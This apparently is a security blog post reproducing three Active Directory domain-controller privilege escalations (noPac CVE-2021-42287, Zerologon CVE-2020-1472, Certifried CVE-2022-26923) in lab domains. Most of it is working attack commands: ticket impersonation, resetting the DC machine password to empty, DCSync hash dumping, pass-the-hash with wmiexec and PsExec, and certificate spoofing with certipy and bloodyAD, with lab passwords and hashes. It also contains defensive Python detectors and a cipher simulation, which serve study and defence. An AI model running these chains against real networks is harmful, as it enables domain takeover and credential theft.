B1ueD0g

BlueDog's Home

Going to work makes my resentment heavier than a ghost's!

Lateral Movement - Some Insights on Domain Controller Privilege Escalation

CVE-2021-42287#

CVE-2021-42287 is a flaw in the Kerberos KDC: when the account named in a TGT cannot be found, the KDC retries the lookup with a trailing `$` appended, and Active Directory does not enforce that computer accounts actually end in `$` (the companion CVE-2021-42278). An authenticated attacker who can create or rename a machine account (the default ms-DS-MachineAccountQuota of 10 allows this) can therefore obtain a ticket that the KDC treats as belonging to the domain controller's machine account, escalate from an ordinary domain user to domain administrator, and execute arbitrary code on the DC.

Exploitation Conditions#

Prerequisites: an ordinary account within the domain (and, by default, the ability to create a machine account)
Affected versions: practically all Windows Server domain controllers without the November 2021 security updates

Vulnerability Reproduction#

The current scenario is as follows: we have obtained control of the Web Server host and the account and password of the domain member webadmin, and we want to use CVE-2021-42287 to attack the domain controller. The noPac tool can be used for exploitation. Before the attack, map the domain name and the domain controller's IP address in the hosts file.

Check for the existence of the vulnerability

noPac.exe scan -domain god.org -user webadmin -pass admin!@#45

The vulnerability exists. Next, we use the ordinary domain user's credentials to exploit it: the tool obtains a TGT in the domain controller's name and then requests a service ticket (ST) for the cifs service of the domain controller's machine account, impersonating administrator.


noPac -domain god.org -user webadmin -pass admin!@#45 /dc owa2010cn-god.god.org --impersonate administrator -dump -use-ldap

After generating the ticket, we check the tickets present on the current computer.

klist 


klist shows a cifs ticket for the domain controller held in the current logon session, so we can connect with PsExec directly.

PsExec \\owa2010cn-god.god.org cmd

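The noPac chain leaves a recognisable trail in the Security log: event 4741 for the machine account that is created, and a pair of 4781 events when its sAMAccountName is renamed to the DC's name without the `$` and then renamed back. The following detection script is an added example, not code from the original post or from the noPac tool; the events it runs over are constructed samples modelled on the lab on this page, and the DC name set is an assumption.

```python
"""Hunt for noPac-style sAMAccountName spoofing (CVE-2021-42278 / CVE-2021-42287)
in Windows Security events.

The chain: create a machine account (4741), rename its sAMAccountName to the
domain controller's name without the trailing '$' (4781), request a TGT,
rename it back (4781), then ask the KDC via S4U2self for a service ticket,
which it issues for the real DC account.  This script correlates the 4741
creation with the 4781 renames.

Events below are CONSTRUCTED samples; field names follow the Security log XML
(TargetUserName, OldTargetUserName, NewTargetUserName, SubjectUserName).
"""
from typing import Dict, List, Optional, Set

DC_SAM_NAMES = {"OWA2010CN-GOD$"}  # assumed: sAMAccountName of the lab DC

SAMPLE_EVENTS = [
    {"EventID": 4741, "Time": "2022-01-10T10:00:01", "SubjectUserName": "webadmin",
     "TargetUserName": "test2$"},
    {"EventID": 4781, "Time": "2022-01-10T10:00:02", "SubjectUserName": "webadmin",
     "OldTargetUserName": "test2$", "NewTargetUserName": "OWA2010CN-GOD"},
    {"EventID": 4768, "Time": "2022-01-10T10:00:03", "TargetUserName": "OWA2010CN-GOD"},
    {"EventID": 4781, "Time": "2022-01-10T10:00:04", "SubjectUserName": "webadmin",
     "OldTargetUserName": "OWA2010CN-GOD", "NewTargetUserName": "test2$"},
    # benign rename by an admin: the computer keeps its '$'
    {"EventID": 4781, "Time": "2022-01-10T11:00:00", "SubjectUserName": "Administrator",
     "OldTargetUserName": "OLDPC$", "NewTargetUserName": "NEWPC$"},
]


def classify_rename(old: str, new: str, dc_sam_names: Set[str]) -> Optional[str]:
    """Return a severity for a 4781 rename, or None if it looks benign."""
    dc_bare = {n.upper().rstrip("$") for n in dc_sam_names}
    if old.endswith("$") and not new.endswith("$"):
        # A machine account lost its '$': the precondition for the KDC fallback lookup.
        if new.upper() in dc_bare:
            return "critical"      # collides with a DC name: textbook noPac
        return "high"
    if not old.endswith("$") and new.endswith("$") and old.upper() in dc_bare:
        return "critical"          # rename back after the TGT was obtained
    return None


def find_nopac_activity(events: List[Dict], dc_sam_names: Set[str]) -> List[Dict]:
    """Correlate 4741 creations with suspicious 4781 renames and return findings."""
    created_by: Dict[str, str] = {}  # sAMAccountName -> creator (from 4741)
    findings = []
    for ev in sorted(events, key=lambda e: e["Time"]):
        if ev["EventID"] == 4741:
            created_by[ev["TargetUserName"].upper()] = ev["SubjectUserName"]
        elif ev["EventID"] == 4781:
            sev = classify_rename(ev["OldTargetUserName"], ev["NewTargetUserName"], dc_sam_names)
            if sev:
                findings.append({
                    "time": ev["Time"],
                    "severity": sev,
                    "actor": ev["SubjectUserName"],
                    "old": ev["OldTargetUserName"],
                    "new": ev["NewTargetUserName"],
                    # creator of the machine account, if its 4741 was seen
                    "creator": created_by.get(ev["OldTargetUserName"].upper())
                               or created_by.get(ev["NewTargetUserName"].upper()),
                })
    return findings


if __name__ == "__main__":
    for f in find_nopac_activity(SAMPLE_EVENTS, DC_SAM_NAMES):
        print(f"[{f['severity']}] {f['time']} {f['actor']} renamed {f['old']} -> {f['new']}"
              f" (account created by {f['creator']})")
```

On the sample data the two renames by webadmin are flagged as critical and tied back to the test2$ account that webadmin created; the admin's OLDPC$ to NEWPC$ rename is ignored. Any rename that strips the `$` from a machine account is worth a look even when it does not hit a DC name.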

CVE-2020-1472#

CVE-2020-1472 (Zerologon) is one of the most severe remote privilege escalation vulnerabilities in Windows domain controllers. Netlogon's ComputeNetlogonCredential encrypts the challenge with AES-CFB8 using a fixed all-zero IV, so an all-zero client challenge produces an all-zero credential for roughly 1 in 256 session keys. An attacker who can reach the DC over RPC can therefore authenticate as the DC's own machine account without knowing its password (about 256 attempts on average), and then use that secure channel to reset the DC machine account password to empty, which leads to domain admin access.

First, obtain the computer name of the domain controller.

net group "domain controllers" /domain

Then use a test script to check whether the domain controller has the vulnerability.

python zerologon_tester.py owa2010cn-god 192.168.3.21


Then use the exploit to connect to the DC and reset its machine account password to an empty value.

python cve-2020-1472-exploit.py OWA2010CN-GOD 192.168.3.21


After execution, the DC's machine account password in Active Directory is empty, so we can connect as that account with an empty password and dump the hashes within the domain (DCSync using the DC's own account). Caveat: the password stored in the DC's local LSA secrets no longer matches the directory, which breaks the DC's own Netlogon authentication and replication, so restore the original machine account password from the dumped secrets as soon as the hashes have been obtained.

secretsdump.exe "god.org/owa2010cn-god$@192.168.3.21" -no-pass


Now use the dumped hash of a domain administrator account (admin here) to perform a Pass-the-Hash (PTH) connection and obtain command execution on the domain controller.

wmiexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 god/admin

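To see why the exploit above succeeds after a few hundred attempts, the following is an added example (not code from the original post or from the exploit scripts) that models Netlogon's ComputeNetlogonCredential: CFB8 mode with a 16-byte all-zero IV. Because AES is not in the Python standard library, the block cipher is replaced by a keyed PRF built from HMAC-SHA256; the CFB8 structure, which is what the bug depends on, is unchanged. The session-key derivation is likewise a deterministic stand-in for the per-session key.

```python
"""Why Zerologon works: Netlogon encrypts the 8-byte client challenge with
AES-CFB8 under the session key, always with an all-zero IV.  With an all-zero
challenge the first ciphertext byte is E(K, 0^16)[0].  When that byte is 0
(probability 1/256 for a random key) the shift register stays all zeros and
every later byte is 0 too, so the credential is eight zero bytes whatever the
key.  The attacker simply repeats the handshake until the server accepts.

prf_block is a stand-in for AES-128 so this runs with the standard library.
"""
import hashlib
import hmac


def prf_block(key: bytes, block: bytes) -> bytes:
    """Stand-in for AES-128 block encryption (NOT AES; a 16-byte keyed PRF)."""
    return hmac.new(key, block, hashlib.sha256).digest()[:16]


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes, block_fn=prf_block) -> bytes:
    """CFB with an 8-bit feedback segment: each plaintext byte is XORed with the
    first byte of E(register); the ciphertext byte is then shifted into the register."""
    register = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        keystream_byte = block_fn(key, bytes(register))[0]
        c = p ^ keystream_byte
        out.append(c)
        register = register[1:] + bytes([c])
    return bytes(out)


def compute_netlogon_credential(session_key: bytes, challenge: bytes) -> bytes:
    """MS-NRPC ComputeNetlogonCredential with the AES flag: CFB8, IV = 16 zero bytes."""
    return cfb8_encrypt(session_key, bytes(16), challenge)


def zero_challenge_accepted(session_key: bytes) -> bool:
    """True if an all-zero client challenge yields the all-zero credential under this key."""
    return compute_netlogon_credential(session_key, bytes(8)) == bytes(8)


def session_key_for_attempt(seed: bytes, attempt: int) -> bytes:
    """Deterministic stand-in for the per-session key derived from the random server challenge."""
    return hashlib.sha256(seed + attempt.to_bytes(4, "big")).digest()[:16]


def simulate_attack(max_attempts: int = 5000, seed: bytes = b"lab") -> int:
    """Model the attacker's loop: every ReqChallenge/Authenticate3 round gets a fresh
    session key, so each attempt is an independent 1/256 trial.  Returns the attempt
    on which the zero credential is accepted, or 0 if none within max_attempts."""
    for attempt in range(1, max_attempts + 1):
        if zero_challenge_accepted(session_key_for_attempt(seed, attempt)):
            return attempt
    return 0


if __name__ == "__main__":
    print(f"zero credential accepted on attempt {simulate_attack()} (expected around 256)")
```

The fix shipped by Microsoft rejects client challenges whose first bytes are all zero and enforces signing and sealing on the channel; the zero IV itself is part of the protocol as specified, which is why the test script on this page probes the DC by replaying exactly this handshake rather than inspecting a version number.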

CVE-2022-26923#

This vulnerability (Certifried) allows a low-privileged user to escalate to domain administrator in a default Active Directory environment that has the Active Directory Certificate Services (AD CS) role installed: the dNSHostName of a machine account the user controls can be pointed at a domain controller, and the CA then issues a Machine certificate in the DC's name. Very few medium to large Active Directory environments run without AD CS, which makes this vulnerability both dangerous and practical to exploit.

Exploitation Conditions#

Prerequisites:

  1. An ordinary account within the domain
  2. A certificate server exists within the domain

Affected Versions: Windows 8.1, Windows 10, Windows 11, Windows Server 2012 R2, Windows Server 2016, Windows Server 2019, Windows Server 2022, etc.

Environment Setup#

First, prepare a host with Active Directory Domain Services set up; here we choose Windows Server 2012 R2. Since this vulnerability relies on certificate services, Active Directory Certificate Services must be installed on the DC. Click Add Roles and Features, proceed with the defaults until the Server Roles page, and select Active Directory Certificate Services. On the Role Services page, check Certification Authority, Certification Authority Web Enrollment and Certificate Enrollment Policy Web Service, then click Install.

After installation, configure Active Directory Certificate Services from the notification in Server Manager. Select the three role services checked during installation and proceed to the CA name. After configuring the CA certificate, proceed to the server certificate: select the certificate to be assigned for SSL later, click Next, then Configure. To check that the configuration succeeded, open the Certification Authority console and verify that certificate templates are present. The exploitation condition for this vulnerability is an ordinary user within the domain, so create a user on the DC; this user's credentials will be used for the domain controller privilege escalation.

Vulnerability Exploitation#

Obtain CA Name#

Currently, our known information is:

Domain Controller: Win 2012
    IP: 192.168.45.152
    Hostname: DC-2012
Domain: tidesec.local
User: test/Pass123

Next, the first step is to obtain the CA name within the domain.

  1. Query from any domain-joined host (PowerShell)

 Check whether the certificate drive exists
Get-PSDrive cert | ft -AutoSize

 List the certificates in the local machine's trusted root store; the enterprise CA's root certificate, and therefore its name, appears here
Get-ChildItem Cert:\LocalMachine\Root

  2. Query on the domain controller

certutil
certutil -config - -ping

  3. Reasonable guess based on the domain controller hostname and domain name (the default enterprise CA name is <domain name>-<hostname>-CA)

Domain Controller Hostname: DC-2012
Domain Name: tidesec.local
CA Name: tidesec-DC-2012-CA

Apply for Certificate#

Before applying for a certificate, we need to modify the hosts file of our attacking machine to correspond the domain name and IP address.

vim /etc/hosts
192.168.45.152 tidesec.local
192.168.45.152 tidesec-DC-2012-CA
192.168.45.152 DC-2012.tidesec.local

Here we use the certipy tool; install it before use.

python3 setup.py install

After installation, use the low-privileged user, the CA name and the domain controller's computer name we just obtained to request a certificate.

certipy req 'tidesec.local/test:Pass123@DC-2012.tidesec.local' -ca tidesec-DC-2012-CA -template User

The certificate for the test user is issued successfully. Run the following to authenticate with the certificate and obtain the user's NT hash.

certipy auth -pfx test.pfx

Successfully obtained the NT hash, which confirms that the lab environment works. Next, we need bloodyAD to create a machine account. Before creating it, note that there are currently no accounts under Computers on the domain controller. Now create one.

python3 bloodyAD.py -d tidesec.local -u test -p 'Pass123' --host 192.168.45.152 addComputer test2 'Test12345'

Now a test2 machine account has been added to the domain. Next, set its dNSHostName attribute to the domain controller's FQDN.

python3 bloodyAD.py -d tidesec.local -u test -p 'Pass123' --host 192.168.45.152 setAttribute 'CN=test2,CN=Computers,DC=tidesec,DC=local' dNSHostName '["DC-2012.tidesec.local"]'

Next, we use the newly created machine account test2 to request a Machine certificate; because its dNSHostName now names the domain controller, the CA effectively issues the DC$ certificate. (If the dNSHostName write is rejected with a constraint violation, clear the account's servicePrincipalName first: AD derives the HOST/ and RestrictedKrbHost/ SPNs from dNSHostName, and those would collide with the DC's SPNs.)

certipy req 'tidesec.local/test2$:Test12345@192.168.45.152' -template Machine -dc-ip 192.168.45.152 -ca tidesec-DC-2012-CA

At this point the issued certificate is not test.pfx but dc-2012.pfx, named after the hostname, and it is a certificate for the domain controller's computer account. Next, we authenticate with this certificate, and Certipy retrieves the NTLM hash of DC-2012$.

certipy auth -pfx dc-2012.pfx -dc-ip 192.168.45.152

Then we can use impacket's secretsdump.py with the DC-2012$ hash to perform a DCSync attack and dump the domain's user hashes.

python3 secretsdump.py 'tidesec.local/DC-2012$@DC-2012.tidesec.local' -hashes :20d4bd2f70725811f4e39fe77166e00b

After that, use wmiexec.py with the domain administrator's hash to gain command execution on the domain controller.

python3 wmiexec.py tidesec.local/administrator@192.168.45.152 -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7

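Defenders can hunt for the two preconditions this chain relies on (a non-zero ms-DS-MachineAccountQuota and a machine account whose dNSHostName collides with a domain controller's) in an export of the domain's computer objects. The following checker is an added example, not code from the original post, certipy or bloodyAD; the computer objects are constructed samples modelled on the lab domain on this page, and the domain SID and RID are assumptions.

```python
"""Hunt for Certifried (CVE-2022-26923) preconditions and artifacts in a dump
of computer objects (e.g. the result of an LDAP search for objectClass=computer).

Flags:
  * a non-DC object whose dNSHostName equals a DC's dNSHostName
    (userAccountControl SERVER_TRUST_ACCOUNT is clear on the impostor), and
  * accounts created through the machine-account quota, which AD records by
    stamping mS-DS-CreatorSID on the object.

Objects below are CONSTRUCTED samples for the lab domain on this page.
"""
from typing import Dict, List

SERVER_TRUST_ACCOUNT = 0x2000       # userAccountControl bit set on domain controllers
WORKSTATION_TRUST_ACCOUNT = 0x1000  # ordinary member computers
TRUSTED_FOR_DELEGATION = 0x80000    # present on DCs by default

DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"  # assumed lab domain SID

SAMPLE_COMPUTERS = [
    {"dn": "CN=DC-2012,OU=Domain Controllers,DC=tidesec,DC=local",
     "sAMAccountName": "DC-2012$", "dNSHostName": "DC-2012.tidesec.local",
     "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "mS-DS-CreatorSID": None},
    {"dn": "CN=test2,CN=Computers,DC=tidesec,DC=local",
     "sAMAccountName": "test2$", "dNSHostName": "DC-2012.tidesec.local",
     "userAccountControl": WORKSTATION_TRUST_ACCOUNT,
     "mS-DS-CreatorSID": DOMAIN_SID + "-1105"},   # assumed RID of the user 'test'
    {"dn": "CN=WEB01,CN=Computers,DC=tidesec,DC=local",
     "sAMAccountName": "WEB01$", "dNSHostName": "web01.tidesec.local",
     "userAccountControl": WORKSTATION_TRUST_ACCOUNT,
     "mS-DS-CreatorSID": None},
]


def is_domain_controller(obj: Dict) -> bool:
    return bool(obj["userAccountControl"] & SERVER_TRUST_ACCOUNT)


def find_dnshostname_collisions(computers: List[Dict]) -> List[Dict]:
    """Return non-DC computer objects whose dNSHostName matches a DC's dNSHostName."""
    dc_names = {c["dNSHostName"].lower() for c in computers
                if is_domain_controller(c) and c.get("dNSHostName")}
    hits = []
    for c in computers:
        name = (c.get("dNSHostName") or "").lower()
        if name in dc_names and not is_domain_controller(c):
            hits.append({
                "dn": c["dn"],
                "sAMAccountName": c["sAMAccountName"],
                "dNSHostName": c["dNSHostName"],
                "quota_created": c.get("mS-DS-CreatorSID") is not None,
                "creator_sid": c.get("mS-DS-CreatorSID"),
            })
    return hits


def quota_created_accounts(computers: List[Dict]) -> List[str]:
    """Machine accounts added by ordinary users via ms-DS-MachineAccountQuota."""
    return [c["sAMAccountName"] for c in computers if c.get("mS-DS-CreatorSID")]


def assess_machine_account_quota(quota: int) -> str:
    """ms-DS-MachineAccountQuota on the domain naming context is 10 by default;
    setting it to 0 closes the path used here (the attacker then needs an
    account that already holds Create Child rights on an OU)."""
    if quota == 0:
        return "ok"
    return f"risk: any domain user can add {quota} machine accounts"


if __name__ == "__main__":
    print(assess_machine_account_quota(10))
    for h in find_dnshostname_collisions(SAMPLE_COMPUTERS):
        print(f"{h['sAMAccountName']} claims {h['dNSHostName']} "
              f"(quota-created: {h['quota_created']}, creator: {h['creator_sid']})")
```

On the sample data the test2$ object is reported because it claims DC-2012.tidesec.local while not being a DC, and its mS-DS-CreatorSID shows it was added through the quota. In a real domain the same query is worth running against the Domain Controllers OU membership rather than the UAC bit alone, since both can be consulted from a low-privileged LDAP bind.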